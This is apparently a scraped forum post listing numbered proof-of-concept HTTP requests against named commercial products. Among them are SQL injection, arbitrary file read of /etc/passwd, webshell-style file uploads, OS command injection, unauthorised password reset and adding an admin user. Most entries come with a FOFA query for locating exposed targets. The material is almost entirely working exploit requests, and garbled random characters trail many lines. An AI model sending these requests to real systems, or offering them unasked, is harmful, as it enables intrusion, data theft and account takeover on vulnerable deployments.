GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
. T5 i% b6 T$ g# ~3 }Host: your-ip
* q' M& d% x! M' s# q! D. N! h  \" R: VUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 D8 _" A7 F, n! W( e* T* u
Accept-Charset: utf-8+ O$ v1 J( _+ k4 ?! M
Accept-Encoding: gzip, deflate5 o, t. ^/ p& O0 H/ m5 S1 o/ s
Connection: close
% T+ b" u5 X' d' U6 V" ]5 C- l% [( {3 E

% r1 Q! P( q4 L/ ]% v& `/ F2 X/ @184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加$ V; H+ p6 H2 G
FOFA:server="SunFull-Webs"
* t. t7 h) s$ J7 @POST /soap/AddUser HTTP/1.1& Q1 P; h2 ?7 k& b  B2 q6 M* D
Host: your-ip
! e* U6 Y. d" n  Z4 Y5 XAccept-Encoding: gzip, deflate
  l7 s- |3 }8 B- @" e7 b7 |: UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# n  [5 p/ t2 i$ }1 b2 q- T
Accept: application/xml, text/xml, */*; q=0.019 H) K5 ?2 A% D4 D2 m8 u3 n' K
Content-Type: text/xml; charset=utf-8* U6 w% s9 x+ J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* U& b+ A) ^" n, n" ~0 Q
X-Requested-With: XMLHttpRequest' A! N/ P. c; m3 d
+ Q2 h  l: r& b0 F

% l! H; e/ c/ A; m$ d. I9 t6 {insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
2 G: S) n0 p. T$ m' }9 Y6 `- K* l& g: x
$ p* g; X3 r5 F% ~) o2 j2 m/ u% I
185. 瑞友天翼应用虚拟化系统SQL注入
  s1 I( r$ G; e0 Q6 m1 vversion < 7.0.5.1
0 Y4 p- r0 T$ S, w) xFOFA:app="REALOR-天翼应用虚拟化系统"# l( o3 _' f; U5 d$ {
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
3 o' u/ X: w, p# y; ?8 u+ @9 JHost: host
; C+ R* j. y$ B: [* B- P# S
5 h# l: s  t9 G8 v, z% ?% O
* N8 Z* |5 H/ Q186. F-logic DataCube3 SQL注入: N5 k8 @: t5 _' c9 H3 v' J* F
CVE-2024-31750
( b; \* O5 V+ [7 i) hF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统, R  q+ S! `7 Q! h9 P  q
FOFA:title=="DataCube3"
5 }: k& {- l# q1 P% I- r; Q- EPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
2 V5 _4 p2 s+ u' _% O9 SHost: your-ip
' b3 L* N9 a8 O. x' V+ ?5 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
& {+ [% k9 n' e2 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
9 s; [7 }6 E0 @) o4 z6 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: y5 W0 e( }$ f! a# A! M  vAccept-Encoding: gzip, deflate" [, J0 `. C7 `( Z6 }7 N+ i
Connection: close8 W9 r& H+ V$ w) ?& D& z
Content-Type: application/x-www-form-urlencoded
2 W+ T5 e, J3 e0 n) t- g& N. a+ }4 W# o- I
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
- O5 W/ F: v0 ~  l9 t1 e! b5 H; S$ [. S: ]* K& v

" {) p3 T' Z- a# s; j' t187. Mura CMS processAsyncObject SQL注入# F5 x- ]9 M* j* t: k
CVE-2024-32640. n1 f: E4 v3 j
FOFA:"Mura CMS"  K9 f% z* y# j  O
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
1 s; W8 K; A5 d, _3 o/ hHost: your-ip
& I& k: J$ J% ~6 YContent-Type: application/x-www-form-urlencoded
% n$ X7 b( R( q% p, }. w  x9 r- A  a4 L" w
, c% ~/ j, D4 q( L
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
( n# l' a9 |$ z) @7 l6 H5 ]; P# P5 L) Y8 j

: R7 }5 [+ z; K, [188. 叁体-佳会视频会议 attachment 任意文件读取
5 d( s& |% Z$ W& }: ^1 Gversion <= 3.9.7
5 ?$ A8 a; w2 d6 L* O6 IFOFA:body="/system/get_rtc_user_defined_info?site_id"" B5 ^+ ?+ j7 z9 c
GET /attachment?file=/etc/passwd HTTP/1.1
; Q% B' B6 Z5 c: {4 V8 sHost: your-ip
. p3 q) [- ^  t# q, T9 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. D% x) X( J7 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; B' s; P1 o  X1 \7 AAccept-Encoding: gzip, deflate7 G* O/ A$ q' H, m7 n5 D, |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
. e4 H+ c  D9 u5 V$ p- D1 o5 kConnection: close
4 \* x5 n( y1 _3 d
$ h7 x* a! F. S( F- ^" z! Y/ X& ?4 H0 \5 e7 j8 N
189. 蓝网科技临床浏览系统 deleteStudy SQL注入7 G$ |) a6 u3 K* y% N
FOFA:app="LANWON-临床浏览系统"
6 T/ w6 d% ?. v1 g; QGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.19 Q) M. w8 D4 ~% w/ C  V0 H
Host: your-ip7 W% l9 ~& B# H; [; S8 G
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 Y) x( O6 G* |. l0 r' \& F+ cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# Q( o) c& x* q4 _5 n; x) Z' Z
Accept-Encoding: gzip, deflate
6 q- E/ }; {9 ?+ F. EAccept-Language: zh-CN,zh;q=0.9" ?( X6 z0 o: X7 J  m4 F
Connection: close+ O/ v# I" o( P8 ~& X

4 O, s: h& H# q
/ I3 {$ Y  X4 A( V5 ^0 ~. G9 f190. 短视频矩阵营销系统 poihuoqu 任意文件读取
& s0 Z5 }5 M% u3 Y, h( v' VFOFA:title=="短视频矩阵营销系统"; i! s3 D5 \  ?! I# H& j  J. @
POST /index.php/admin/Userinfo/poihuoqu HTTP/2* J* H! _  c: Z  `1 a4 ]- b
Host: your-ip
) z0 e8 J/ w: f1 T4 S# dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36- x1 x$ [% L* `7 T! N2 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
4 f9 y+ v( u, }+ m( mContent-Type: application/x-www-form-urlencoded/ _7 F& j! e# v0 a# Q0 f
Accept-Encoding: gzip, deflate" \5 X" T- C. T4 P
Accept-Language: zh-CN,zh;q=0.9, H+ v9 t8 T4 K8 r2 s

" }+ u. N* Q# R7 S/ ]poi=file:///etc/passwd
$ k3 l( Q: V" D$ i
3 X# w# |1 I9 L! l7 G2 F! ]( N: Z: U+ i4 ]& K" P
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
7 W1 u9 A( y* V% uFOFA:body="/CDGServer3/index.jsp"4 g2 m& O4 C1 Z9 d) Z
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
, v. x+ \$ H9 l4 N, B7 S9 ?6 \) GHost: your-ip0 G+ S' E" x' x  Z! j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- I! j2 }5 P8 k$ H  p
Content-Type: application/x-www-form-urlencoded+ e" G6 U# A# d& w. {0 V& S

8 n# u4 g, }) {% F# v/ Q# l, Jcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
% u$ W$ ^6 N2 G. o* T; D  x' W: l
( b" \" w$ h( t: N% d0 T0 ?' X# O5 j( c; [& Z
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
$ K  U9 f3 ~4 f  D# M, hFOFA:title="用户登录_富通天下外贸ERP"& ~# c* W9 C% M& p/ W5 ~
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
; v2 o1 Q4 z! X1 p8 ~Host: your-ip
# a, d0 x0 k3 z  C+ mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# m0 ?: [2 `) [- @% w" M$ W' L
Content-Type: application/x-www-form-urlencoded* U: D( ^8 Z( H5 e
4 E' f- ~4 v; q: W, B. q

0 K& y4 f; ?% y" X) p<% @ webhandler language="C#" class="AverageHandler" %>$ U3 \: j6 S1 t9 Q4 y
using System;
; {" |3 ~- R; G* L$ H' jusing System.Web;% ?# }( }! \! E7 d) j
public class AverageHandler : IHttpHandler" \; ~5 z" F: ]6 Y
{& U3 d6 X/ Y5 W/ I
public bool IsReusable
3 y9 @& }# \. V" P# f+ x0 [3 ?% U{ get { return true; } }0 j! X8 {3 X/ H0 h. `
public void ProcessRequest(HttpContext ctx)& H* `5 s' `. u+ q
{5 M8 A& {( H' T+ {0 D/ E) [, J! c( e1 y
ctx.Response.Write("test");$ Y; T4 O9 |9 e. N
}
( U% ~7 O3 R. ^+ V9 y* B6 `( T$ {' ^}
$ C" U- @: o+ U% _3 q6 c# r- }! |+ M$ ]" @  x+ [( R! W

( F1 S: c( b0 A6 U/ N9 v: ]193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
* L5 t8 d0 e3 o0 M( }FOFA:body="山石云鉴主机安全管理系统", Q0 A1 y0 b3 V6 W- ]$ R0 N
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
  F/ C: Y* F5 x7 t& a! uHost:) t# Z; k- O. c1 A/ h
Cookie: PHPSESSID=2333333333333;
9 T0 Q& A8 m. v+ l0 ?& T2 PContent-Type: application/x-www-form-urlencoded
5 h; u) j% M1 V# sUser-Agent: Mozilla/5.0" H' u9 Q- h" g+ P% [. P

4 Q/ E' G) j! b, j+ M" r( Q. W
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
1 j9 Y% a2 C; D' V* t2 T0 f$ ?Host:
) `) f) S/ B/ m3 k; `4 m- R1 d, J- wUser-Agent: Mozilla/5.0
* m; Q) F  e& W4 h/ h6 ~. ?& tAccept-Encoding: gzip, deflate# c8 @8 z0 q8 f# s; W$ a
Accept: */*
3 Z7 c2 `6 a- u7 H  qConnection: close
( t3 A0 ?& d" z5 p$ z7 t: A2 aCookie: PHPSESSID=2333333333333;! c% k% H/ T- |  v, J' T$ q
Content-Type: application/x-www-form-urlencoded
5 j' v% z8 z; ?8 jContent-Length: 84* t+ L9 |, i0 q& J# }
* I7 G0 n! c; F0 [- O
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')4 ^1 z5 Z) ^3 o
8 u% K' g6 u3 A4 \! O! B! m1 |1 ^
4 W2 b- @8 Y7 t7 D5 A  z# Q
GET /master/img/config HTTP/1.1
8 S& W3 L+ ^& o4 {$ O( L( l0 `Host:# J9 H6 ?+ M: L+ T1 C7 y) E
User-Agent: Mozilla/5.0- _0 X- I) A. x0 L: u- \6 W
9 x' Q: K4 V$ l

" U3 Z6 n* }& A  I+ v  N194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
; J; _7 V: y( j) r( T0 N- yFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' o, {+ \1 i& ^. w/ h! J
: a8 `7 z  z* A+ O" l$ S/ yPOST /servlet/uploadAttachmentServlet HTTP/1.18 L( R2 m5 G; G2 `3 T) C4 l; j
Host: host
$ J  |1 L5 \( @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
, v, K7 Z, X: B. k2 [- _* b# u! vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" P* }9 z' M5 q$ \0 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 Y* V1 v9 V4 g+ r5 I  F+ b. gAccept-Encoding: gzip, deflate
6 x6 m( \3 e4 }8 r6 IConnection: close1 S; R# ~2 }' k: I& R6 ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk( v* ]$ I  y- {7 z$ p
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
  f, G# h6 M; L7 t5 U& F' S' p% ~2 M" `
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
6 M6 ?+ {: w4 a, G* {Content-Type: text/plain
. J7 |1 ~0 i/ `; l<% out.println("hello");%>
6 b9 {$ m+ U# b" l& @4 I------WebKitFormBoundaryKNt0t4vBe8cX9rZk5 Y% L2 [, {) n- Y% ~# Z
Content-Disposition: form-data; name="json"- p. x; p1 ^9 D6 r: {/ N
{"iq":{"query":{"UpdateType":"mail"}}}! X7 \2 B! ^- L3 v, R( M8 x5 b
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--' ~: p  k/ t$ Q6 K$ A# s0 I" g
! z$ Y% W$ B; ~  g3 \* a
) O" c% K3 I& r; I* V! \
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行+ g5 w3 d1 Q+ A6 J, J
FOFA:title=="飞鱼星企业级智能上网行为管理系统( s( u. a! Z  |( O, _
POST /send_order.cgi?parameter=operation HTTP/1.1) U% F. @8 ~  n# z) h$ a9 Z
Host: 127.0.0.10 G3 k  a3 p4 q0 a, _1 D
Pragma: no-cache! T  a7 K% k! S1 \: M
Cache-Control: no-cache
& ]+ I: N' `$ Z* GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 b, W, n3 X: x7 C0 U
Accept: */*
+ v3 |: @( l9 N' \( G- ?Accept-Encoding: gzip, deflate
/ A2 @% I& s3 H1 a. VAccept-Language: zh-CN,zh;q=0.9
" i6 ?2 {, _. j! LConnection: close" N9 G' h. y. U6 v2 B9 a
Content-Type: application/x-www-form-urlencoded% [1 `8 T' i8 Z( E! T8 y
Content-Length: 68. U, ~2 G8 ]  z% _. Q0 W7 _' l

1 I1 J- K$ ^) s, K5 u8 N; k/ q" H, y{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
2 `$ \% t" l8 w5 i/ j" Z! m' `
5 m& q0 {3 l# u3 a: N0 N3 V2 ^  l3 e5 w9 L# H4 n$ X$ m  k
196. 河南省风速科技统一认证平台密码重置- W/ h; |; Z+ e+ }8 {
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
# r6 g- R; l( ^* J/ PPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
1 i& Y+ Z4 h2 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- {3 V; O1 P9 e$ d2 r3 JContent-Type: application/json;charset=UTF-89 {- H1 x/ a0 N9 b7 g
X-Requested-With: XMLHttpRequest
$ B% c4 r- t9 }" l0 \Host:
# [+ m/ q2 @- L7 KAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
( z" D6 _; D( k7 i' J% q) h5 O$ L9 YContent-Length: 45/ u! [5 ?9 P) e& g$ e
Connection: close% O: D; e- V* S1 r( m5 o* t( T" v2 i
+ u1 W5 y$ z! H, ]8 r
{"xgh":"test","newPass":"test666","email":""}
; n: r0 m3 m3 E' w* U( V3 ?6 d9 C

, T- \; _+ F6 q0 @* C( y* v  m" P& j/ `1 ~
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
* G, z$ ^' q3 B, b: p% ZFOFA:app="浙大恩特客户资源管理系统"
! ?7 J$ u! M6 ~1 |GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
& B2 x/ g, f: `) F+ Z' l  NHost:
& f! ]  s0 ~3 \* z- vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.367 R1 [6 ~( d) s- S1 c
Accept-Encoding: gzip, deflate
( N6 y1 j2 O$ n# bConnection: close
( t# v2 n: X9 b1 w+ ~: {( F
! n1 Z; I, @8 f: L; V( O  \$ q" c) N% L% z( \6 A

" V. B/ b6 b5 M, l* C% V" q  \198.  阿里云盘 WebDAV 命令注入# y8 M0 k6 R( F
CVE-2024-29640% y3 s  r8 q3 F( n# s: }7 m6 y
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
- ?1 j. B9 b& r/ H2 {: T: Y4 L/ ~Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
* y  y3 L) D9 [( |$ ^/ @/ H) MAccept: */*- I! I) M, L  }7 }/ k
Accept-Encoding: gzip, deflate: e7 t+ N$ h1 u% w9 f8 X2 p
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.65 [3 R7 ^6 I9 c/ S; q
Connection: close3 H& g" y7 I, I/ V2 m7 \3 N  c# S

& e5 G' J" {- o+ p! s$ E( N
1 `3 _% {5 R/ G% w199. cockpit系统assetsmanager_upload接口 文件上传8 E) K- N. D3 ]/ O9 s
3 g4 [/ z, d' g6 ]7 X2 @9 {: C5 |
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
5 [3 F9 R, Y' [; k, UGET /auth/login?to=/ HTTP/1.18 Q( L" t2 s! r5 ~& I

( s& A9 O: J$ t4 |8 j2 K6 a: X响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
* S2 b! X6 O1 Q+ F, H
0 N# n0 C" p9 p2.使用刚才上一步获取到的jwt获取cookie:
* g- A* U* s  n$ [' T! C! O+ x7 H$ M' r* l
POST /auth/check HTTP/1.1* b4 T3 z$ S  x0 ]
Content-Type: application/json
9 F! g% b) h8 s0 x, I4 U$ n+ m; T( d6 D" \  W' Z: u6 K7 q5 d. p
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
9 U1 R4 w3 u7 C% {; i/ D
. z2 O5 A2 }# t; K/ J响应:200,返回值:7 v$ _# f( W: }
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
! L2 @' M6 m7 d4 f# u0 G& V+ MFofa:title="Authenticate Please!"
: T9 v9 W; i9 ~7 B, i6 cPOST /assetsmanager/upload HTTP/1.11 T" p& t! ]: b2 u7 m* X
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
! N" o1 F0 |# `1 c$ Z; FCookie: mysession=95524f01e238bf51bb60d77ede3bea92# `) z5 ]2 c& e9 J* L" a

, h# ~1 {: E. _! J" D. F-----------------------------36D28FBc36bd6feE7Fb3
& D5 h" F! I0 u* T8 `  l3 XContent-Disposition: form-data; name="files[]"; filename="tttt.php"
+ L) v# D9 B) ?: uContent-Type: text/php
6 n$ V; `  t2 q) R, \3 c
# ^; z4 B; S& [& A( o* ~<?php echo "tttt";unlink(__FILE__);?>
0 e5 I$ _5 p8 i4 P5 Y, S; L-----------------------------36D28FBc36bd6feE7Fb3
/ d# F2 ?5 k4 F* s# \Content-Disposition: form-data; name="folder"
6 h. w3 S$ r1 q7 ?+ e9 ]. [, ~( `6 r6 l/ |2 N
-----------------------------36D28FBc36bd6feE7Fb3--
/ i0 ~+ U; i: V5 }; v0 F. Q& O$ I% _- b

' r2 j+ `: {5 K- Q( G# |# z/storage/uploads/tttt.php
* F' K6 ~; f  l
- X$ j+ j0 q  ~2 K! @200. SeaCMS海洋影视管理系统dmku SQL注入
& }& A9 A. {+ @' TFOFA:app="海洋CMS") |/ n) c+ M( Q  m9 L
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1$ M# e+ k+ @- c8 z
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s' ^, k; W1 T9 r7 ^0 H& U0 W
Upgrade-Insecure-Requests: 11 l+ Z# s1 Q% Z8 e5 c5 l. v
Cache-Control: max-age=0
3 l8 B  r: s2 H  B+ b5 A: bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  T) t( j) l: U
Accept-Encoding: gzip, deflate
% j' `* x, |/ c! R3 I) Q1 p: GAccept-Language: zh-CN,zh;q=0.9/ d$ T0 s) Q3 a+ i

0 Q; D, y' Z- X" u$ E. z) }  y- r) b( ]/ b
201. 方正全媒体新闻采编系统 binary SQL注入
7 y' l. ~/ p0 N5 t$ Z3 |- xFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
! d+ y" I! h% w! s/ k! l' J5 UPOST /newsedit/newsplan/task/binary.do HTTP/1.1
0 v1 v" y! Z" G2 s5 `- B9 VContent-Type: application/x-www-form-urlencoded
5 u& E* f% ?' N$ n5 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 ?9 v' A( v% vAccept-Encoding: gzip, deflate, @- |- V0 w1 z% s
Accept-Language: zh-CN,zh;q=0.96 D7 r; ]3 r# N. ~3 p3 r; I: T" [
Connection: close' a5 N6 s0 I7 i4 d, G

- ~* B% m! u" \9 Z& G9 r9 fTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=16 N5 I6 {- j8 o
3 |4 S5 E$ M) _/ e, M/ ?' Q5 O. _
+ e2 K4 s* E6 j2 R: M$ z2 j' [
202. 微擎系统 AccountEdit任意文件上传
0 o: ], _- B7 ~3 zFOFA:body="/Widgets/WidgetCollection/"
: D. f9 o5 E6 C: {获取__VIEWSTATE和__EVENTVALIDATION值
. d- c" w0 D. g; S7 p' AGET /User/AccountEdit.aspx HTTP/1.1
6 g! M0 |4 \5 T& @- S0 }. `Host: 滑板人之家
6 E: a0 B. Z9 A+ H: s! EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
% V6 _3 \/ ?& }: y: t: b  i9 [Content-Length: 0" e6 ~9 d4 Y; m$ G7 w+ j
3 J2 @* h# g/ V* M. C

" d# x) E; P* j  @  ~& t替换__VIEWSTATE和__EVENTVALIDATION值4 T. @6 c) @6 O$ `6 l( S
POST /User/AccountEdit.aspx HTTP/1.1
) ^- Q6 a8 c! w$ j5 AAccept-Encoding: gzip, deflate, br" P& b" \. Y, c/ K
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
8 \; H! [0 Y8 T9 s* O$ x0 ~- I6 T3 h  s! Q3 T! r
-----------------------------786435874t38587593865736587346567358735687& z5 Z6 ~3 V; O# ~+ L7 a
Content-Disposition: form-data; name="__VIEWSTATE"0 m, p: m; h5 Q8 T2 r2 U6 m
; H* d; T, u0 v0 r  |, X; \; ?
__VIEWSTATE- b6 \) F& s- ~1 E! @1 Y# Q: H8 b
-----------------------------786435874t38587593865736587346567358735687- x- t3 D( S3 N) @% t# H% w
Content-Disposition: form-data; name="__EVENTVALIDATION"
8 h% \& t! [: n! E
5 E# v% \. z( {! d2 g__EVENTVALIDATION4 k9 Z0 `1 l  P2 H. E5 Z  p
-----------------------------786435874t38587593865736587346567358735687
2 T2 S" |$ X9 e- X' {; H% W3 DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"0 A+ a) E0 m& v
Content-Type: text/plain
0 O5 A# d- d, K! Y7 t
2 I1 x8 U9 |3 K" W1 }, t. jHello World!  y5 z, [8 J" @" L: N/ X" ~# Z
-----------------------------786435874t38587593865736587346567358735687" _- o# c3 s: v; q
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"3 ~: Y+ W) O  `3 [- K) e7 j2 K
2 [6 h& K" z  b  H4 {# w
上传图片
! L- ]& v8 W# k7 i+ R1 Y-----------------------------786435874t385875938657365873465673587356874 u9 N/ p% [: d$ z1 i* F- p0 G5 @
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
2 U* `6 |2 }$ P" t
9 [9 w1 h) I% R4 h/ M) n- `3 C" Z4 c# P; \
-----------------------------786435874t38587593865736587346567358735687+ v6 f2 N( s. D2 `% J
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
$ j9 K8 Q8 I) o) D1 f; K8 i- I2 |2 H8 a: w4 n/ |/ |1 u% |" S. ^: c

' ], i7 Q% t$ K  ]$ J9 m-----------------------------786435874t38587593865736587346567358735687--
0 z' A' n/ D# a( }$ R
) M8 r& b' E$ T: _. N. h+ h0 y+ u5 W2 M/ m( F+ N8 m1 a0 |
/_data/Uploads/1123.txt
7 W6 ]% W/ l6 m7 z2 C8 P- x$ C6 i7 R( {* ]6 L& T8 F! S: `5 g
203. 红海云EHR PtFjk 文件上传- F0 i6 @) l6 g
FOFA:body="RedseaPlatform"9 J0 d, @/ M* |/ x3 X
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1, ~* l9 @8 q3 `* M  N* \2 X
Host: x.x.x.x8 \/ y3 S! {( v
Accept-Encoding: gzip0 P% j$ b( a5 L' W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! x2 l9 S1 `' `" g+ b- j$ p6 _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
. m1 u1 c' e  C: s% wContent-Length: 210+ v" O1 f: V  P: j+ p) G
- n) |% ?2 B4 f- Q0 s3 c+ Z, @% v
------WebKitFormBoundaryt7WbDl1tXogoZys4
  l- }/ x/ `' i1 f" M6 P& dContent-Disposition: form-data; name="fj_file"; filename="11.jsp"3 _( F8 w/ E  S, x7 |$ L- @
Content-Type:image/jpeg# T' D  S; ^$ C% d, B' r

% ^2 w( ?8 l" _$ E" s" ]<% out.print("hello,eHR");%>
  _% Z& t9 f, x" X8 d------WebKitFormBoundaryt7WbDl1tXogoZys4--# Q  b" e6 B3 A. B  n  x% m

7 k% l: i; L! B $ {" f8 y7 v8 o+ U$ t4 a
- c+ Q9 V7 @3 R

, r! }5 U+ T/ p: F. j  P9 D7 m1 F) g! @, ~5 l
/ w7 ?% u' p" v: m6 {( u7 h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表